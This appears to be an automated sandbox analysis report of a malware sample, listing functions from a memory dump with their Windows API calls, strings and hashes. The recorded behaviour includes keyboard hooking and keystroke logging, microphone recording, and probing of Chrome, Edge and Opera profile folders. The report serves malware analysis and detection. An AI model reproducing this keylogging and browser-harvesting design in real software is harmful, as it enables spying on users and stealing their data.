                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                • Opcode ID: 1138a700532d9599964523c42fe9d14b17403e05a5b04461eb8da4684f43988c
                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                • Opcode Fuzzy Hash: 1138a700532d9599964523c42fe9d14b17403e05a5b04461eb8da4684f43988c
                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: cfeb685ec421024236c3fe8a582943f52c7b46feb71b451bddb7413a3931a58d
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: cfeb685ec421024236c3fe8a582943f52c7b46feb71b451bddb7413a3931a58d
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                • Opcode ID: e0a8a6f2d7e4cdede1675b5f964430e951fa820bb9e9f60fc8bb9b9bf6386c36
                                • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                • Opcode Fuzzy Hash: e0a8a6f2d7e4cdede1675b5f964430e951fa820bb9e9f60fc8bb9b9bf6386c36
                                • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: 33f513a8367aa60c9c39e45db4b09adeb783fa014ebf533a38ecdd59b48b7fa1
                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                • Opcode Fuzzy Hash: 33f513a8367aa60c9c39e45db4b09adeb783fa014ebf533a38ecdd59b48b7fa1
                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449A5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                • _free.LIBCMT ref: 00449ACC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$DeleteEnter_free
                                • String ID: =k
                                • API String ID: 1836352639-1421436146
                                • Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                • Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
                                • Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                • Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _abort.LIBCMT ref: 0044F0A9
                                • _free.LIBCMT ref: 0044F0DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_abort_free
                                • String ID: x9k
                                • API String ID: 289325740-1900533136
                                • Opcode ID: 2e9ada046b615cce909465303d253cbb0255e834f3ab9ea9ae3315e12a655f22
                                • Instruction ID: 2af8ca7d7d9da888dd2a293bb18e2fdfe9fbdc3dbac3c8495f7aa1b7b8b1e2f7
                                • Opcode Fuzzy Hash: 2e9ada046b615cce909465303d253cbb0255e834f3ab9ea9ae3315e12a655f22
                                • Instruction Fuzzy Hash: F2010871D01A218FEB30AF6A840125EB7A0BF44715B15422FE52863352CB7C6D46CFCE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • waveInPrepareHeader.WINMM(006AE1F0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(006AE1F0,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: XMG
                                • API String ID: 2315374483-813777761
                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044378C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: H%j
                                • API String ID: 269201875-3294387659
                                • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction ID: ffc8389238c956ab6c1ca4f2b01b58cd1871601a5e35f3520dab429f03a8b914
                                • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction Fuzzy Hash: 7DE0E592A0182014F6717A3F6C0575B0545CBC2B7FF11833BF538861C1CFAC4A46519E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: f1acc3cc63483105fb3c6833ea2415d43d59c245a1346c36ac9ceb6aca08711c
                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                • Opcode Fuzzy Hash: f1acc3cc63483105fb3c6833ea2415d43d59c245a1346c36ac9ceb6aca08711c
                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: 911eca338311f85069e2af4ccc8ed928932e81e1ee07fccbbe9b002445cdb3b1
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: 911eca338311f85069e2af4ccc8ed928932e81e1ee07fccbbe9b002445cdb3b1
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 25af406674ba748cf22b69dac7a276e1c55e1f7e049a59cb8dfb70449f372998
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: 25af406674ba748cf22b69dac7a276e1c55e1f7e049a59cb8dfb70449f372998
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004437E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                • Opcode ID: dd2f914049f4f370ef2f5aa51de3004961a69ba16bdb171d6c04a041743c3e8a
                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                • Opcode Fuzzy Hash: dd2f914049f4f370ef2f5aa51de3004961a69ba16bdb171d6c04a041743c3e8a
                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: 9adb0c1e0019ef2078c37c5794edba0078e1ae36a46a0c7e5cd30b10605925b2
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: 9adb0c1e0019ef2078c37c5794edba0078e1ae36a46a0c7e5cd30b10605925b2
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
